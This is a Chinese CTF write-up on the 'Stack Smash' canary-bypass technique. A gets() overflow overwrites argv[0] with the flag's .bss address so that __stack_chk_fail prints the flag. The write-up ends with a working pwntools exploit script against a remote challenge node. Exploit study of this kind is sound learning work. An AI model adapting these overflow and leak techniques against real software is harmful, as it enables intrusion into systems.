花式栈溢出——Canary保护是吧?接化发,拿来吧你
目录
前言
一、代码分析
0.保护
1.main函数
2.sub_CF0()函数 (v9指向的函数)
二、Stack Smash过程
0.原理简述
1.条件与准备
2.地址泄露
①真实地址泄露
②flag地址泄露
③argv[0]地址泄露
3.exp
总结
前言
Canary保护,是在栈上插入一段随机数;进入函数后,也就是call完后会有push ebp,mov ebp,esp,最后来个mov esp。canary保护特殊在上述操作后会再加一个canary。最后函数leave ret前会检测一次,canary与原先值是否相同来判断是否被栈溢出覆盖返回地址了。
然而,Smash这种方法,恰好是利用Canary保护机制,修改相关函数参数,泄露信息。详细介绍Smash的文章不在少数,本文主要聚焦于做出题目,因此重点(但非详细)阐述我所理解的重点部分。
一、代码分析
0.保护
全绿。。。这里方可从Canary下手。
存在这个函数,也是smash存在的标志之一。
值得注意的是,Stack Smash在libc2.23后就不可利用了。
1.main函数
大致流程是:读入name,开启server,如果backdoor,执行v9函数。
很明显第26行gets存在栈溢出漏洞。
2.sub_CF0()函数 (v9指向的函数)
将我们最关心的flag信息读取到了bss段上。 而调用这个函数,需要‘server’时,输入‘backdoor’。
二、Stack Smash过程
0.原理简述
为了方便引出下述步骤,这里还是粗略地说明一下其中原理。
当Canary被修改后,函数返回时,检测到Canary错误,会调用 _stack_chk_fail() 函数,而这个函数会打印输入的文件名,即argv[0],存在栈上。
void __attribute__ ((noreturn)) __stack_chk_fail (void)
{
__fortify_fail ("stack smashing detected");
}
void __attribute__ ((noreturn)) internal_function __fortify_fail (const char *msg)
{
/* The loop is added only to keep gcc happy. */
while (1)
__libc_message (2, "*** %s ***: %s terminated\n",
msg, __libc_argv[0] ?: "<unknown>");
}
试想一下:如果我们构造垃圾数据造成栈溢出,且修改了原本argv[0]的内容为flag存放地址,那么canary报错时,就会将flag地址的内容即flag字符串输出。这就达成了我们的目的。
1.条件与准备
按照上述原理,我们构造payload,需要知道以下信息:
- PIE保护开启,需要泄露一个有用的真实地址
- flag存放的地址
- argv[0]的地址
2.地址泄露
①真实地址泄露
可以知道,sub_E40() 函数读取了16个字节的数据到存储空间为16个字节的字符串数组中。注意字符串在打印时遇到\x00才会停止。于是这里可以泄露栈上信息
通过gdb调试如下:
发现栈上紧随输入部分的是sub_CF0函数的真实地址
于是——输入16个字符后,在随后的输出中,接收该地址。同时通过该条函数的偏移量,我们可以得到程序基址。
②flag地址泄露
在server时输入backdoor后,sub_CF0函数被调用,读取目录下的flag文件(本地自己创建)
在gdb调试时,等待flag文件输入完成,用search指令即可查找读入的字符串位置。
结合①泄露的地址,事实上,基址知道了,flag在bss段偏移0x202040 :
也可以印证。
③argv[0]地址泄露
注意,该地址应是栈上地址,而我们要做的是输入来溢出覆盖复写栈上内容。因此我们更加关心的是,该地址与我们输入的偏移量是多少。
而我们的栈溢出漏洞点在gets()处,也即先前输入backdoor并循环执行的同一位置。
注意,由箭头关系我们知道,文件名字符串指针,存在栈上的地址为0x7fffffffe0f8,而非0x7fffffffe018!
计算输入位置到存储位置偏移量:
然而0x178的偏移,带入后并不能成功得到答案。看了其他师傅的wp,同样的过程,他们的结果是0x168,可能是动态链接库版本的问题(?)这里存疑,求解答。
3.exp
from pwn import *
from pwn import p64,u64
context(arch="amd64",os="linux",log_level="debug")
io=process('./easyecho')
io=remote('node4.anna.nssctf.cn',28711)
io.recvuntil(b'name~')
io.send(b'a'*0x10)
io.recvuntil(b'a'*0x10)
addr=u64(io.recv(6).ljust(8,b'\x00'))
print(hex(addr))
base_addr=addr-0xcf0
io.sendlineafter(b'Input: ',b'backdoor')
payload=b'a'*0x168+p64(base_addr+0x202040)
io.sendlineafter(b'Input: ',payload)
io.sendlineafter(b'Input: ',b'exitexit') #ret才会触发canary检查
io.recv()
io.interactive()#交互才能得到stack报错信息
总结
花式栈溢出刚接触,还是啃下来了。其他更多的内容,也要花时间啃!